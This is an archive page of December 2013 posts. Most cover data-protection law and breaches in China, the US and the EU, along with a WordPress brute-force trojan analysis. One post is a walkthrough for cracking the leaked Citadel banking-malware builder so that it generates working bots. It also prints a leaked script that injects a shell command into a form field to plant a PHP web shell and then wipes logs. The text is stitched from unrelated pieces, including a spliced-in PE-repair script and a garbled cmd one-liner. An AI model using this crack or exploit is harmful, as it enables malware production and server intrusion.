Monthly Archives: December 2013

Recent Data Breach Events in China

In recent months, the Chinese government has devoted attention to the protection of personal information with, as we previously reported, the promulgation of a number of new data protection regulations. This focus is also illustrated by recent actions related to crimes involving personal information.

Gang Selling Personal Information Busted

Police apprehended a 10-member gang in Beijing and Shanghai for illegally obtaining and selling nearly one million pieces of personal information. The gang made over RMB 320,000 in illegal profits from their activity.

In mid-August of this year, a woman in Shanghai filed a complaint with the police, claiming that her personal information was improperly disclosed after she had applied for an online exam. After applying, the woman received spam messages relating to training classes in the same subject matter. Zhabei District police investigated online message platforms, and targeted an education information consulting company as the source of the spam messages. When police apprehended the owner in the Pudong New Area, he said that he had bought the personal information from an unemployed local resident, who was then apprehended in the same district. Further investigation showed that this local resident had obtained the information from a man who was responsible for maintaining a national examination application website. This person had sold the data to the local resident, who then resold them to the education company owner and a few others, including the owners of another education company and a cultural communications company.

Courier Firm Staff under Suspicion of Large-Scale Customer Data Theft

Staff at a leading Shanghai courier firm, YTO Express, are suspected of selling millions of items of personal information about its customers to online traders, who then sold the information to online retailers.

A spokesperson for YTO Express said in October 2013 that it was investigating the case and promised to crack down on the information theft. It has since been verified that the personal information sold included customer names, addresses, telephone numbers and transaction serial numbers. Armed with this information, unscrupulous online retailers can forge customer records, while other businesses can use the information to contact potential customers. Since the incident, YTO Express has reportedly taken emergency measures to reduce security risks, and has begun to conduct a comprehensive internal investigation to search for the source of the improper disclosure of personal information. YTO Express is also reportedly working with its information technology partners to enhance the security of express delivery information.

Arrest of Three Men in Illegal Sales of Millions of Items of Personal Information

An employee at a local taxation bureau in Wuhan took advantage of his position to secretly copy personal information from the local taxation bureau’s intranet onto a USB memory drive. The employee then sold the information to another person via QQ, an instant messaging software, for an illegal profit of over RMB 100,000. The purchaser then resold the information to a third person. All three men were arrested for illegally obtaining personal information.

How the protection of Citadel got cracked

Recently on a forum someone requested cbcs.exe (Citadel Backconnect Server).
If you want to read more about the Backconnect on Citadel, the link that g4m372 shared is cool: http://laboratoriomalware.blogspot.de/2012/12/troyan-citadel-backconnect-windows.html

I searched for this file by downloading a random mirror of the leaked Citadel package, hoping to find it inside.
In the end the file wasn't in the leaked archive, but it had already been grabbed by various malware trackers.
MD5: 50A59E805EEB228D44F6C08E4B786D1E
Malwarebytes: Backdoor.Citadel.BkCnct

And since I've downloaded the leaked Citadel package... let's have a look at the Builder.
It could make an interesting post.

Citadel.exe: a33fb3c7884050642202e39cd7f177e0
Malwarebytes: Hacktool.Citadel.Builder
"ERROR: Builder has been moved to another PC or virtual environment, now it is deactivated."

This file is packed with UPX:

Same for the Citadel Backconnect Server and the Hardware ID generator.
But when we try to unpack it with UPX we get an exception:

UPX tells us that there is something wrong with the file header: aquabox used a lame trick.
With a hex editor we can clearly see that there is a problem with the DOS header:

We have 0x4D 0x5A ... 00 ... and a size of 0xE8 for the memory.
e_lfanew is null, so let's fix it at 18h with 0x40.
Miracle:
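As an added example (not code from the original post), a small Python triage script for the DOS-header trick described above: it checks whether e_lfanew (the DWORD at offset 0x3C of the DOS header) points at a plausible PE header and, when the field has been zeroed, locates the real "PE\0\0" signature and rewrites the field so that standard tools can parse the file again. The sample bytes it builds are constructed, not taken from the Citadel binaries.

```python
"""Triage and repair a PE whose DOS header e_lfanew has been zeroed.

Added example, not code from the original post. Sample image below is
constructed; nothing here comes from the Citadel binaries."""
import struct

DOS_MAGIC = b"MZ"
PE_SIGNATURE = b"PE\0\0"
E_LFANEW_OFFSET = 0x3C           # IMAGE_DOS_HEADER.e_lfanew, a DWORD
DOS_HEADER_SIZE = 0x40
# i386, x64, ARM, ARMv7 (Thumb-2), ARM64
KNOWN_MACHINES = {0x014C, 0x8664, 0x01C0, 0x01C4, 0xAA64}


def read_e_lfanew(data):
    """Return the e_lfanew value stored in the DOS header."""
    return struct.unpack_from("<I", data, E_LFANEW_OFFSET)[0]


def looks_like_nt_headers(data, offset):
    """True if 'PE\\0\\0' at offset is followed by a plausible IMAGE_FILE_HEADER."""
    if offset < DOS_HEADER_SIZE or offset + 24 > len(data):
        return False
    if data[offset:offset + 4] != PE_SIGNATURE:
        return False
    machine, nsections = struct.unpack_from("<HH", data, offset + 4)
    # A real file header names a known CPU and has between 1 and 96 sections.
    return machine in KNOWN_MACHINES and 1 <= nsections <= 96


def check_dos_header(data):
    """Classify the DOS header: returns (status, e_lfanew).

    status is one of 'ok', 'not-mz', 'e_lfanew-zero', 'e_lfanew-bad'."""
    if len(data) < DOS_HEADER_SIZE or data[:2] != DOS_MAGIC:
        return "not-mz", None
    e_lfanew = read_e_lfanew(data)
    if e_lfanew == 0:
        return "e_lfanew-zero", 0
    if not looks_like_nt_headers(data, e_lfanew):
        return "e_lfanew-bad", e_lfanew
    return "ok", e_lfanew


def find_nt_headers(data):
    """Scan for the real NT headers when e_lfanew cannot be trusted.

    Returns the offset of 'PE\\0\\0', or None if nothing plausible is found."""
    pos = data.find(PE_SIGNATURE, DOS_HEADER_SIZE)
    while pos != -1:
        if looks_like_nt_headers(data, pos):
            return pos
        pos = data.find(PE_SIGNATURE, pos + 1)
    return None


def repair_e_lfanew(data):
    """Return a copy of data with e_lfanew rewritten to the located NT headers.

    Raises ValueError if the file is not MZ or no NT headers can be found.
    This only undoes the header trick; it does not unpack anything."""
    if len(data) < DOS_HEADER_SIZE or data[:2] != DOS_MAGIC:
        raise ValueError("not an MZ file")
    status, _ = check_dos_header(data)
    if status == "ok":
        return bytes(data)
    pe_offset = find_nt_headers(data)
    if pe_offset is None:
        raise ValueError("no plausible NT headers found")
    fixed = bytearray(data)
    struct.pack_into("<I", fixed, E_LFANEW_OFFSET, pe_offset)
    return bytes(fixed)


def build_sample(e_lfanew_value):
    """Constructed test image: a 0x40-byte DOS header, 0x40 bytes of stub padding
    (so the NT headers begin at 0x80), then a 32-bit IMAGE_FILE_HEADER with two
    sections. e_lfanew is set to the given value."""
    dos = bytearray(DOS_HEADER_SIZE)
    dos[:2] = DOS_MAGIC
    struct.pack_into("<I", dos, E_LFANEW_OFFSET, e_lfanew_value)
    stub = b"\0" * 0x40
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_header = PE_SIGNATURE + struct.pack("<HHIIIHH", 0x014C, 2, 0, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + stub + file_header + b"\0" * 0x20


if __name__ == "__main__":
    broken = build_sample(0)
    print(check_dos_header(broken))        # ('e_lfanew-zero', 0)
    print(check_dos_header(repair_e_lfanew(broken)))   # ('ok', 128)
```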

Same tricks for the Hardware ID Calculator and the Citadel Backconnect Server; I will come back to these two files later.
Now that we have clean code we can read the Time/Date Stamp and view the resources, but more interestingly, see how Citadel is protected.

Viewing the strings already gives us a good insight:
PHYSICALDRIVE0, Win32_BIOS, Win32_Processor, SerialNumber...

But we don't really need to waste time working out how the generation is done,
although you can put a breakpoint at the beginning of the calculation procedure (0x4013F2).
At the end you will be here; this routine finalises your HID:

Alternatively, you can also have a look at the Hardware ID Calculator.

I had a problem with this file: the first layer was an SFX archive:

Malware embedded (stealer):


Conclusion: Don't rush on leaked stuff.

Alright, now that you have extracted/unpacked the right HID Calculator you can open it in Olly.
The code is exactly the same as the one in the Citadel Builder; it may help to locate the calculation procedure in the builder, although it's really easy to find anyway.

That was just a short aside. Back to the builder: after the generation ends you will have several occasions to see your HID on the stack, like here:
And the crucial part starts here.

When the Citadel package of Citab got leaked (see this article for more information), an important file was also released:

The HID of the original machine that was running the builder, so you just have to replace your HID with this one, like this:

And this is how the protection of Citadel becomes super weak and the builder can generate working malware.
Now you just have to write a code cave or inject a DLL to modify it permanently; child's play.

The problem every cracker faced with leaked Citadel builders was finding the right HID key.
Previously leaked Citadel builders were not leaked with the HID key,
e.g. vortex1772_second - 1.3.5.1.

And you can't just 'force' the procedure to generate a bot, because the Citadel stub is encrypted inside; that is why an easy way to crack the builder appeared when the package got leaked with the correct HID.
Without the right HID you can still brute-force it until you break the key, but this is much harder and time-consuming; that solution would also be a greater achievement and more respected in a scene release.

To finish, let's get back to the Citadel backconnect server that was requested on kernelmode.info.

This script was also leaked with the Citab package.
It's for the Windows box, and it's super secure... oh wait..

# Leaked test script for the Windows backconnect gate (Python 2).
import urllib
import urllib2

def request(url, params=None, method='GET'):
    if method == 'POST':
        urllib2.urlopen(url, urllib.urlencode(params)).read()
    elif method == 'GET':
        if params == None:
            urllib2.urlopen(url)
        else:
            urllib2.urlopen(url + '?' + urllib.urlencode(params)).read()

def uploadShell(url, filename, payload):
    data = {
        'b'  : 'tapz',
        'p1' : 'faggot',
        'p2' : 'hacker | echo "' + payload + '" >> ' + filename
    }
    request(url + 'test.php', data)

def shellExists(url):
    return urllib.urlopen(url).getcode() == 200

def cleanLogs(url):
    delete = {
        'delete' : ''
    }
    # fixed: the original used the global URL instead of the url parameter
    request(url + 'control.php', delete, 'POST')

URL      = 'http://localhost/citadel/winserv_php_gate/'
FILENAME = 'shell.php'
PAYLOAD  = '<?php phpinfo(); ?>'

uploadShell(URL, FILENAME, PAYLOAD)
print '[~] Shell created!'
if not shellExists(URL + FILENAME):
    print '[-]', FILENAME, 'not found...'
else:
    print '[+] Go to:', URL + FILENAME
cleanLogs(URL)
print '[~] Logs cleaned!'

In short, happy new year guys :)



Episode #173: Tis the Season

Hal finds some cheer
From somewhere near the borders of scriptistan, we send you:
function t {
    for ((i=0; $i < $1; i++)); do
        s=$((8-$i)); e=$((8+$i));
        for ((j=0; j <= $e; j++)); do [ $j -ge $s ] && echo -n '^' || echo -n ' '; done;
        echo;
    done
}
function T {
    for ((i=0; $i < $1; i++)); do
        for ((j=0; j < 10; j++)); do [ $j -ge 7 ] && echo -n '|' || echo -n ' '; done;
        echo;
    done
    echo
}
t 3; t 5; t 7; T 2; echo -e "Season's Greetings\n from CLKF"

Ed comes in out of the cold:

Gosh, I missed you guys.  It's nice to be home with my CLKF family for the holidays.  I brought you a present:

c:\>cmd.exe /v:on /c "echo. & echo A Christmas present for you: & color 24 & 
echo. & echo 0x0& for /L %a in (1,1,11) do @(for /L %b in (1,1,10) do @ set /a
%b%2) & echo 1"& echo. & echo Merry Christmas!

Tim awaits the new year:

Happy New Year from within the borders of Scriptistan!


Function Draw-Circle {
    Param( $Radius, $XCenter, $YCenter )

    for ($x = -$Radius; $x -le $Radius ; $x++) {
        $y = [int]([math]::sqrt($Radius * $Radius - $x * $x))
        Set-CursorLocation -X ($XCenter + $x) -Y ($YCenter + $y)
        Write-Host "*" -ForegroundColor Blue -NoNewline
        Set-CursorLocation -X ($XCenter + $x) -Y ($YCenter - $y)
        Write-Host "*" -ForegroundColor Blue -NoNewline
    }
}

Function Draw-Hat {
    Param( $XCenter, $YTop, $Height, $Width, $BrimWidth )

    $left = Round($XCenter - ($Width / 2))
    $row = "#" * $Width
    for ($y = $YTop; $y -lt $YTop + $Height - 1; $y++) {
        Set-CursorLocation -X $left -Y $y
        Write-Host $row -ForegroundColor Black -NoNewline
    }

    Set-CursorLocation -X ($left - $BrimWidth) -Y ($YTop + $Height - 1)
    $row = "#" * ($Width + 2 * $BrimWidth)
    Write-Host $row -ForegroundColor Black -NoNewline
}

Function Set-CursorLocation {
    Param ( $x, $y )

    $pos = $Host.UI.RawUI.CursorPosition
    $pos.X = $x
    $pos.Y = $y
    $Host.UI.RawUI.CursorPosition = $pos
}

Function Round {
    Param ( $int )
    # Stupid banker's rounding
    return [Math]::Round( $int, [MidpointRounding]'AwayFromZero' )
}

Clear-Host
Write-Host "Happy New Year!"
Draw-Circle -Radius 4 -XCenter 10 -YCenter 8
Draw-Circle -Radius 5 -XCenter 10 -YCenter 17
Draw-Circle -Radius 7 -XCenter 10 -YCenter 29
Draw-Hat -XCenter 10 -YTop 2 -Height 5 -Width 7 -BrimWidth 2
Set-CursorLocation -X 0 -Y 38

Win32/BruteForce.WP

DrWeb released news about this malware in August; they know it as 'Trojan.WPCracker.1'.
And more recently ~ 1e8cd0f0f1702820c870302520bc0176.

This executable communicates with a C&C at dorblu99.net.
Let's have a closer look.

Panel screenshots (images not reproduced here): Login, Main, Bot info, Broken wordpress, Statistics, Add domains, Add admin panels, Add logins, Add passwords, Add module for jm (zip), Add module for wp (zip), Add shell jm (php), Cron brute, Ban list, Logs.
Domains list (downloaded by the malware so it knows which WordPress sites it should brute-force):
36k URLs.

Roman of abuse.ch has also written an interesting post about this threat.

State Post Bureau of China Releases Draft Normative Rules Involving Personal Information Protection for Public Comment

On November 27, 2013, the State Post Bureau of the People’s Republic of China (the “SPBC”) released five draft normative rules for solicitation of public comment. Three of these rules, respectively entitled Provisions on the Management of the Security of Personal Information of Postal and Delivery Service Users (the “Draft Provisions”), Provisions on the Reporting and Handling of Security Information in the Postal Sector (the “Reporting and Handling Provisions”), and Provisions on the Management of Undeliverable Express Mail Items (the “Management Provisions”) contain significant requirements regarding the protection of personal information. The deadline for submitting comments on the rules is December 27, 2013.

Provisions on the Management of the Security of Personal Information of Postal and Delivery Service Users

The Draft Provisions were formulated in accordance with the Postal Law of the People’s Republic of China, the Measures for the Supervision and Administration of Security of the Postal Industry, and other relevant laws and regulations. The purposes of the Draft Provisions are to (1) strengthen the management of the security of users’ personal information in postal and delivery services, (2) protect the legitimate rights and interests of postal and delivery service users, (3) maintain the safety of postal correspondence and information, and (4) promote the sound development of the postal industry. The Draft Provisions apply to the supervision, administration, operation and use of postal and delivery services in China which involve the security of users’ personal information.

The Draft Provisions first define “personal information of postal and delivery service users” (the “Users’ Information”) as information used in the course of postal and delivery services. These include the name, address, ID number, telephone number and company name of the sender (and of the recipient), and the order number, delivery time and item details.

Second, the Draft Provisions set forth a number of general requirements for the protection of Users’ Information. These include:

  • Franchised express delivery enterprises must agree to clauses in the franchise agreement which establish safeguards for Users’ Information and specify security responsibilities of the franchisee and franchisor. When a franchisor incurs an information security incident, the franchisee must be required to undertake responsibilities of its own for the incident response;
  • A postal or express delivery enterprise must sign a confidentiality agreement with its operational staff to clarify confidentiality obligations in relation to Users’ Information, and must provide continuing training and education to develop the knowledge and skills of its operational staff with respect to the security of Users’ Information;
  • A postal or express delivery enterprise must establish a mechanism for handling complaints relating to the security of Users’ Information;
  • Whenever a postal or express delivery enterprise is engaged by operators (such as e-commerce operators and TV shopping operators) to provide delivery services, the agreement between the parties must include security clauses for the protection of Users’ Information, which specify the scope of information use, security protection measures for information exchanges and allocation of responsibilities in the event of information security incidents;
  • When entrusting a third party to input Users’ Information, a postal or express delivery enterprise must ensure that the third party is qualified to undertake information security safeguards, and must bear responsibility for information security incidents caused by the third party; and
  • No postal or express delivery enterprise, or operational staff thereof, may transfer any Users’ Information to any third party without express authorization under law, or without the users’ written consent.

Third, in addition to the foregoing requirements, postal or express delivery enterprises are required to strengthen the management of the security of physical and electronic information appearing on the waybill, for example:

  • A postal or express delivery enterprise must strengthen the management of its business and processing locations and physically isolate the user service area from the mail (or express mail) processing and storage sites. To prevent the physical information from being stolen or leaked, non-staff must be strictly forbidden from entering such sites or reading over mail items (or express mails).
  • To prevent malicious code from destroying information systems and networks, and to avoid disclosure or alteration of information, postal and express delivery enterprises must install necessary antivirus software and hardware, set up measures to encrypt the delivery of Users’ Information through public networks, and strengthen their management of system passwords and of the security of electronic Users’ Information storage.

Finally, violations of the Draft Provisions may result in penalties including administrative warnings, fines and (under certain circumstances) even criminal liability.

Provisions on the Reporting and Handling of Security Information in the Postal Sector

The Reporting and Handling Provisions define “security information which should be reported and handled” as emergency and operational information relating to the security of the daily processes of postal or express delivery enterprises. The Reporting and Handling Provisions apply to the reporting and handling of this security information by postal or express delivery enterprises, or by postal administration authorities.

Under the Reporting and Handling Provisions, when Users’ Information has been illegally disclosed, postal or express delivery enterprises are required to report security information without delay to their local postal administration authorities and public security departments. If more than 500 items of Users’ Information have been illegally disclosed, local authorities must report the incident to the provincial postal administration authorities within two hours after they receive the report.

Provisions on the Management of Undeliverable Express Mail Items

The Management Provisions are intended to promote the freedom and privacy of correspondence and to protect the legitimate rights and interests of express delivery clients and their correspondents. The Management Provisions emphasize that, at times when undeliverable express items are held in custody and are being processed, no express delivery information may be misappropriated or illegally provided to others.

Conclusion

The three draft rules contain specific provisions on the protection of personal information in the postal industry. Once promulgated, the rules will have nationwide effect. The promulgation of these rules will likely alleviate problems arising from the misappropriation of personal information that is used in postal and express delivery services. In light of the emergence of markets that trade in personal information in a variety of fields, however, regulating the handling of personal information solely in the postal sector is insufficient; other sectors that offer opportunities to sell personal information need regulation as well. Until an integrated, national Personal Data Protection Act that governs the handling of data protection in all industry sectors is adopted, markets for trading in personal information in China are likely to persist.

Read our previous coverage on Chinese personal information protection issues.

Federal District Judge Ruling Casts Cloud Over NSA Data Collection

On December 16, 2013, the United States District Court for the District of Columbia granted a preliminary injunction barring the federal government from collecting and analyzing metadata related to two consumers’ mobile phone accounts. The court held that the two individual plaintiffs were entitled to a preliminary injunction because they had standing to challenge the government’s data collection practices and were substantially likely to succeed on the merits of their claim. The court has stayed issuance of the injunction pending appeal to the D.C. Circuit Court.

The court’s opinion states that the federal government, through the National Security Agency (“NSA”), issued a production letter to the plaintiffs’ wireless provider requesting that the provider disclose vast quantities of consumer phone records indiscriminately, regardless of any suspicion of wrongdoing. The consumer phone records obtained by the NSA contained metadata, such as the phone numbers of outgoing and incoming calls to an individual’s account. According to the decision, the NSA (1) has collected bulk telephony metadata from multiple telecommunications providers for more than seven years, (2) has combined the metadata from the various telecommunications providers into one database, and (3) conducts sophisticated computerized searches of the metadata. The combined database is enormous, and it is updated daily. The court indicated that, based on the government’s description of its collection and review procedures, it was convinced that “everyone’s metadata” is analyzed.

Among other allegations, the plaintiffs charged that the NSA’s data collection practices constitute unreasonable searches and seizures that violate the Fourth Amendment. The court held that plaintiffs had standing to challenge the NSA’s data collection because they could point to “strong evidence” that their telephony metadata was collected and will continue to be collected. In granting the preliminary injunction, the court found that the plaintiffs were substantially likely to succeed on the merits of their claim because it is “significantly likely” that a person’s reasonable expectation of privacy is violated when the “[g]overnment, without any basis whatsoever to suspect [him or her] of wrongdoing, collects and stores for five years their telephony metadata for purposes of subjecting it to high-tech querying and analysis without any case-by-case judicial approval.”

White House Publishes Report on Government Surveillance Programs

On December 18, 2013, the White House published a report recommending reforms to the federal government’s wide-ranging surveillance programs. The voluminous report, entitled “Liberty and Security in a Changing World,” was authored by The Review Group on Intelligence and Communications Technologies, an advisory panel that includes experts in national security, intelligence gathering and civil liberties.

The report begins by describing the varying goals of U.S. surveillance efforts, which range from defending national security to protecting the right to privacy to strengthening strategic alliances with other countries. The report then details 46 recommendations designed to balance these goals. Some notable recommendations include:

  • Establishing a general rule that the federal government should not collect and store “mass, undigested, non-public personal information about individuals to enable future queries and data-mining for foreign intelligence purposes”;
  • Increasing the transparency of the Foreign Intelligence Surveillance Court;
  • Applying the Privacy Act of 1974, which regulates the use and disclosure of personally identifiable information by federal agencies to “both US persons and non-US persons”;
  • Increasing the use of encryption and urging U.S. companies to encrypt data in transit, at rest and in storage (including in the cloud); and
  • Creating a Civil Liberties and Privacy Protection Board to “oversee Intelligence Community activities for foreign intelligence purposes, rather than only for counterterrorism purposes.”

The report concludes by noting the rapid pace of technological development and emphasizing that the reforms advocated in the report are intended to “safeguard the privacy and dignity of American citizens, and to promote public trust, while also allowing the Intelligence Community to do what must be done to respond to genuine threats.”

Read the full report.

French Data Protection Authority Issues Guidance on Cookie Consent and Expiration

On December 16, 2013, the French Data Protection Authority (“CNIL”) released a set of practical FAQs (plus technical tools and relevant source code) providing guidance on how to obtain consent for the use of cookies and similar technologies in compliance with EU and French data protection requirements (the “CNIL’s Guidance”). Article 5.3 of the revised e-Privacy Directive 2002/58/EC imposes an obligation to obtain prior consent before placing or accessing cookies and similar technologies on web users’ devices. Article 32-II of the French Data Protection Act transposes this obligation into French law.

The CNIL’s Guidance indicates that this obligation applies to website publishers, operating system and application publishers, advertising networks, social networks and website analytics solutions providers.

The CNIL’s Guidance also states that only certain cookies are exempt from the consent requirement under French data protection law, namely cookies whose sole purpose is to enable or facilitate electronic communications or that are strictly necessary for the provision of an online communication service as expressly requested by the user. According to the CNIL’s Guidance, this includes:

  • cookies used for a “shopping basket” on a merchant’s website;
  • “Session ID” cookies for the duration of the session (or persistent cookies limited to a few hours in some cases);
  • authentication cookies;
  • multimedia player session cookies;
  • load balancing session cookies; and
  • persistent user interface customization cookies.

Some web analytics solutions also may qualify for an exemption from the consent requirement.

In all other cases, the CNIL’s Guidance emphasizes that:

  • web users’ consent must be obtained before placing or reading cookies and similar technologies (such as web bugs and fingerprinting technologies), and such consent must be obtained each time these technologies are used for a new purpose;
  • the validity of the consent is linked to the quality of the information provided to web users – in particular, web users must be clearly informed of the different purposes for which the cookies and similar technologies will be used; and
  • web users’ consent is valid only if the users have a real choice between accepting or refusing cookies and similar technologies.

In practice, the CNIL recommends obtaining consent using a two-pronged approach, as described below.

Step 1: Provide Information to the Web User About the Cookies and Their Purposes 

According to the CNIL’s Guidance, a banner must appear on the home page or on a subpage of the website when a user visits it. The banner must specify:

  • the exact purposes of the cookies used on the website; and
  • the fact that, by continuing to use the website, the user accepts the use of cookies.

The banner must also include a link to another page (“For more information”) that explains how to change cookie settings and accept or refuse cookies. The CNIL’s Guidance includes a template banner and specifies that such a banner must remain until the user interacts with the website. If the user does not continue to use the website, this absence of action cannot be interpreted as the user’s consent to the use of cookies.

Step 2: The “More Information” Page

According to the CNIL’s Guidance, when a user clicks on the “For more information” link provided in the banner, the user must be directed to information about how to accept or refuse cookies. This may be presented as:

  • a cookie consent mechanism directly available on the website or application;
  • a link to opt-out solutions offered by advertising networks, social networks and website analytics solutions providers, (assuming that these solutions are user-friendly and functional); or
  • under certain circumstances, details on how to modify browser settings to accept or refuse cookies.

Cookie Expiration

The CNIL’s Guidance recommends that a user’s cookie consent may be considered valid for up to 13 months. After this period, the website must get renewed consent from the user. The CNIL’s Guidance states that cookies should be programmed to expire 13 months after they are placed on a user’s device.

Advanced Malware Analysis Training Session 11 – (Part 2) Dissecting the HeartBeat RAT Functionalities

Here is the quick update on this month’s Local Security meet (SX/Null/G4H/owasp) and our advanced malware training session on (Part 2) Dissecting the HeartBeat RAT Functionalities. This is part of our FREE ‘Advanced Malware Analysis Training’ series started in Dec 2012. In this extended session, I explained “Decrypting various Communications Of HeartBeat […]

State “Ban the Box” Legislation Gains Momentum

As reported in the Hunton Employment & Labor Perspectives Blog, the “ban the box” movement continues to sweep through state legislatures. “Ban the box” laws, which vary in terms of scope and detail, generally prohibit employers from requesting information about job applicants’ criminal histories. Recent legislation in two states applies “ban the box” prohibitions to private employers in those states:

  • On December 1, 2013, a new North Carolina law went into effect that prohibits employers from inquiring about job applicants’ arrests, charges or convictions that have been expunged. This prohibition applies to requests for information on applications and during interviews with applicants.
  • On January 1, 2014, a new Minnesota law goes into effect that prohibits employers from inquiring into, requiring disclosure of or considering the criminal record or criminal history of an applicant until the applicant has been selected for an interview or, if there is no interview, until after a conditional offer of employment has been made.

Employers should review their applications and hiring practices to ensure compliance with the new laws, and verify that managers involved in the hiring process understand when, and to what extent, they are permitted to inquire about applicants’ criminal histories.

Read the full post on the Hunton Employment & Labor Blog.

Data, data everywhere! Where it comes from, nobody really knows?

While there are still a few weeks left in 2013, the year has already been the worst for data breaches in the last 10 years, with over 705 million records lost. In addition, 4 of the top 10 data breaches of all time happened in 2013, with the top spot now belonging to Adobe (at least for the moment).

The Adobe breach was discovered and brought to light by Brian Krebs and information security researcher Alex Holden back in October (Brian Krebs is an Advisor to Alex Holden’s company). When the leak was first announced it was said to be about 2.9 million records but soon after the figure changed to what is now confirmed to be approximately 152 million records. Adobe has commented on the amount of data and users impacted a few times, and is expected to provide an update when their investigations are completed. The data has been stated to have a lot of duplicates as well as false data including usernames (email addresses) and encrypted passwords. This data was allegedly obtained directly from Adobe’s servers by unknown hackers who are also said to have obtained data from several other well known sites as well.

Early investigations by Krebs appear to have uncovered major breaches after they obtained the complete database of SSNDOB, an underground carding and personal information website. The SSNDOB investigation uncovered a lot of high-profile names, such as LexisNexis Inc., Dun & Bradstreet, and Kroll Background America, Inc., all of which were hacked and used as a massive database for the SSNDOB website. Another was the Cupid Media breach, which exposed 42 million accounts and, according to Brian Krebs, was found on the same server as the Adobe data, as well as NW3CM and PR News Wire.

One item which does not seem to be fully addressed is how Brian Krebs and Alex Holden were able to obtain this data. In one of the posts, there was a mention that they “discovered a massive 40 GB source code trove stashed on a server,” but their methods were still not abundantly clear. There are several deep web monitoring services available, and we have confirmed that at some point the Adobe data was available for purchase for a whopping $6. However, speculation in some circles has been that this data was originally acquired from a private server, and therefore that, to obtain the data, they would have had to have illicit access to the server themselves.

Regardless of the method used to obtain the data, at this point what they have done is help to raise the awareness of several massive breaches that have impacted millions of people around the world. As we move forward, was this type of discovery a one off or will we see more data breach disclosure in this fashion?

Interview with Champ Clark – Episode 356, Part 1 – December 12, 2013

Champ Clark, also known as "Da Beave" in some circles, is the CTO of Quadrant Information Security headquartered in Jacksonville, Florida. He is one of the founding members of the VoIP hacking group Telephreak and runs the Deathrow OpenVMS cluster. He has co-authored books published by Syngress Publishing and has been interviewed by various magazines. He has spoken at conferences on topics such as "war dialing" the world with VoIP, exploring X.25 networks around the world, and most recently, real time log analysis with "Sagan", software he developed.

EU Court of Justice Advocate-General Finds Data Retention Directive Incompatible with Charter of Fundamental Rights

On December 12, 2013, Advocate-General Cruz Villalón of the European Court of Justice (“ECJ”) issued his Opinion on the compatibility of the EU Data Retention Directive 2006/24/EC (the “Data Retention Directive”) with the Charter of Fundamental Rights of the European Union (the “EU Charter”).

Background
The Data Retention Directive requires EU Member States to ensure that telecommunications service providers collect and retain traffic and location data (but not the substantive content of those communications) for purposes of investigating, detecting and prosecuting serious crimes as defined by national law. The data must be retained for a minimum of six months and a maximum of two years.

The Advocate-General delivered his Opinion in connection with four national cases, one brought by Digital Rights Ireland against the Irish authorities and three cases pending before Austria’s constitutional court.

Opinion of the Advocate-General
In his Opinion, the Advocate-General considered that the collection and the retention, in large databases, of these data constitute a serious interference with the right to privacy contained in the EU Charter. The Advocate-General emphasized that the data could be used to reconstruct a large portion of a person’s conduct, or even a complete and accurate picture of his or her private identity. According to the Advocate-General, the risk that the data might be used for unlawful purposes is increased by the following factors:

  • the data are not retained by national public authorities, or even under their direct control, but by the telecommunications service providers; and
  • the data may be stored at indeterminate locations in cyberspace since the Data Retention Directive does not require the data to be stored in the territory of an EU Member State.

In the light of this serious interference with the right to privacy, the Advocate-General ruled that the Data Retention Directive should have defined the necessary principles for governing the guarantees needed to regulate access to the data and their use, instead of assigning the task of defining and establishing those guarantees to the EU Member States. The Advocate-General concluded that the Data Retention Directive does not comply with the requirement, laid down by the EU Charter, that any limitation on the exercise of a fundamental right must be provided for by law.

Further, the Advocate-General found no reason why the Data Retention Directive requires EU Member States to ensure that the data are retained for a maximum of two years instead of limiting the retention period to less than one year.

In the Opinion, the Advocate-General proposes to suspend the effects of a finding that the Data Retention Directive is invalid in order to enable the EU legislature to adopt, within a reasonable time period, the measures necessary to remedy the invalidity.

Fred Cate of the Centre Submits Comments to NIST on Preliminary Cybersecurity Framework

On December 12, 2013, Fred H. Cate, Senior Policy Advisor in the Centre for Information Policy Leadership at Hunton & Williams LLP (the “Centre”), submitted comments in response to the National Institute of Standards and Technology’s (“NIST’s”) Preliminary Cybersecurity Framework (the “Preliminary Framework”). On October 22, NIST issued the Preliminary Framework, as required by the Obama Administration’s February 2013 executive order, Improving Critical Infrastructure Cybersecurity (“Executive Order”), and solicited comments on the Framework. The Preliminary Framework includes standards, methodologies, procedures and processes that align policy, business and technological approaches to address cyber risks.

The comments criticized the Methodology to Protect Privacy and Civil Liberties, which appears as Appendix B to the framework, as being unlikely to advance either privacy or security.

The primary reason for the criticism is the fact that the proposed privacy methodology is completely distinct both from the Preliminary Cybersecurity Framework itself and from the wide range of successful privacy and data protection programs already implemented by industry leaders.

Commenters also note that the considerable breadth of Appendix B magnifies the concern over the inconsistency of Appendix B. Appendix B does not appear to be limited to security-related activities to start with, and, even when applied to those activities, it raises the prospect of privacy and civil liberties issues being evaluated where experience shows they are unlikely to exist. Moreover, the inclusion of “civil liberties” issues, which historically have applied only in the context of government activities, in a framework that primarily targets the private sector is not only overly broad, but potentially specious. In addition, a number of the requirements of Appendix B go far beyond existing U.S. privacy law.

According to the comments, the proposed methodology also is troubling because of the claim in its introductory text suggesting that it is “based on the Fair Information Practice Principles (FIPPs) referenced in the Executive Order.” FIPPs, such as notice and choice, are a poor basis for addressing most cybersecurity privacy issues. The FIPPs also are being increasingly challenged, precisely because of their often-poor fit in contexts such as Big Data, ubiquitous surveillance and cybersecurity.

The reference to the Executive Order also is misleading since FIPPs are addressed in Section 5 of the Executive Order, which deals with the conduct of government agencies, not industry (and even there are referenced along with “other privacy and civil liberties policies, principles, and frameworks as they apply to each agency’s activities”). FIPPs are not addressed in the context of the privacy methodology in Section 7.

To address these concerns, Cate recommends the following:

  • Eliminate Appendix B and move privacy protection into Appendix A, so that the protection of privacy is clearly integrated with cybersecurity.
  • Make explicit that the privacy protections apply only in the context of information assurance activities.
  • Limit the privacy methodology, wherever it appears, to objectives and principles, rather than specific tasks. In addition, limit the methodology to privacy—not other civil liberties—or if the protection of other civil liberties is to be included, clarify that this responsibility can apply only to government entities.
  • Eliminate any reference to FIPPs.
  • Focus instead on more relevant principles of “accountability” and “stewardship” of personal data, such as the work the Centre has been leading in recent years.
  • Do not assume that all, or even most, information assurance activities will raise privacy issues, and do not impose significant burdens on industry to restrict sharing cyber threat information with the government that might contain personally identifiable information if the government already has access to the data.

Under the Executive Order, NIST is required to issue a final version of the Framework in February 2014.

Hunton Publishes Final Paper in its Series of Executive Briefings on the Proposed EU Data Protection Regulation

